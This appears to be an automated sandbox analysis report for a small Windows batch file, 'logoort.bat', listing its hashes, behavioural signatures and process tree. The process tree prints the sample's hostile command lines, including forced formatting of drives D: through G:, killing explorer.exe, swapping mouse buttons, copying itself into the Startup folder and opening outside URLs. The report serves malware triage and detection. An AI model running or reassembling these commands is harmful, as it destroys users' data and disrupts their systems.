Analysis
- max time kernel: 22s
- max time network: 23s
- platform: windows7_x64
- resource: win7-20240729-en
- resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
- submitted: 09/11/2024, 20:34
- Static task: static1
General
- Target: logoort.bat
- Size: 608B
- MD5: 94fd61ce02cade547895c5c9d0a0bac0
- SHA1: 313ded429034fbfc4567935bb91cc9a409066375
- SHA256: b3a13cdc76dea743146238de8432e0c8e5a8c8b7fb43793077ac92f8a1e1771b
- SHA512: fc100fe14d310fa6d04718a21800ee9e2f3af92b9db3f3aec062956a376834c715605994bb67053d76427a44c6f02a7a409828e5d0b61f339d9a6a92b48d17b0
Malware Config

Signatures
- Deletes itself (1 IoC)
  - pid 2544, process cmd.exe
- Drops startup file (2 IoCs)
  - File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\logoort.bat (cmd.exe)
  - File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\logoort.bat (cmd.exe)
- Reads user/profile data of web browsers (3 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Drops desktop.ini file(s) (1 IoC)
  - File opened for modification: C:\Windows\assembly\Desktop.ini (cmd.exe)
- Drops autorun.inf file (1 TTP, 1 IoC)
  Malware can abuse Windows Autorun to spread further via attached volumes.
  - File opened for modification: C:\Windows\BITLOC~1\autorun.inf (cmd.exe)
- Drops file in Program Files directory (64 IoCs)
- Drops file in Windows directory (64 IoCs)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTP, 2 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (IEXPLORE.EXE)
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (IEXPLORE.EXE)
- Kills process with taskkill (1 IoC)
  - pid 2696, process taskkill.exe
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  - Token: SeSystemtimePrivilege, pid 2544, cmd.exe
  - Token: SeSystemtimePrivilege, pid 2544, cmd.exe
  - Token: SeDebugPrivilege, pid 2696, taskkill.exe
- Suspicious use of FindShellTrayWindow (16 IoCs)
- Suspicious use of SetWindowsHookEx (10 IoCs)
- Suspicious use of WriteProcessMemory (35 IoCs)
Processes
- C:\Windows\system32\cmd.exe (PID 2544)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\logoort.bat"
  Signatures: Deletes itself; Drops startup file; Drops desktop.ini file(s); Drops autorun.inf file; Drops file in Program Files directory; Drops file in Windows directory; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\msg.exe (PID 1644)
    Command line: msg * (Muhahaha)
  - C:\Windows\system32\taskkill.exe (PID 2696)
    Command line: taskkill /IM explorer.exe /f
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\rundll32.exe (PID 2848)
    Command line: Rundll32 user32, SwapMouseButton
  - C:\Program Files\Internet Explorer\iexplore.exe (PID 2844)
    Command line: "C:\Program Files\Internet Explorer\iexplore.exe" http://www.evil-shit.de/
    Signatures: Modifies Internet Explorer settings; Suspicious use of FindShellTrayWindow; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
    - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (PID 2272)
      Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2844 CREDAT:275457 /prefetch:2
      Signatures: System Location Discovery: System Language Discovery; Modifies Internet Explorer settings; Suspicious use of SetWindowsHookEx
  - C:\Program Files\Internet Explorer\iexplore.exe (PID 2680)
    Command line: "C:\Program Files\Internet Explorer\iexplore.exe" http://www.akk.li/pics/anne/jpg
    Signatures: Modifies Internet Explorer settings; Suspicious use of FindShellTrayWindow; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
    - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (PID 2448)
      Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2680 CREDAT:275457 /prefetch:2
      Signatures: System Location Discovery: System Language Discovery; Modifies Internet Explorer settings; Suspicious use of SetWindowsHookEx
  - C:\Windows\system32\format.com (PID 1092)
    Command line: format D:\ /F
  - C:\Windows\system32\format.com (PID 2292)
    Command line: format E:\ /F
  - C:\Windows\system32\format.com (PID 2012)
    Command line: format F:\ /F
  - C:\Windows\system32\format.com (PID 2576)
    Command line: format G:\ /F
Network
MITRE ATT&CK Enterprise v15
Downloads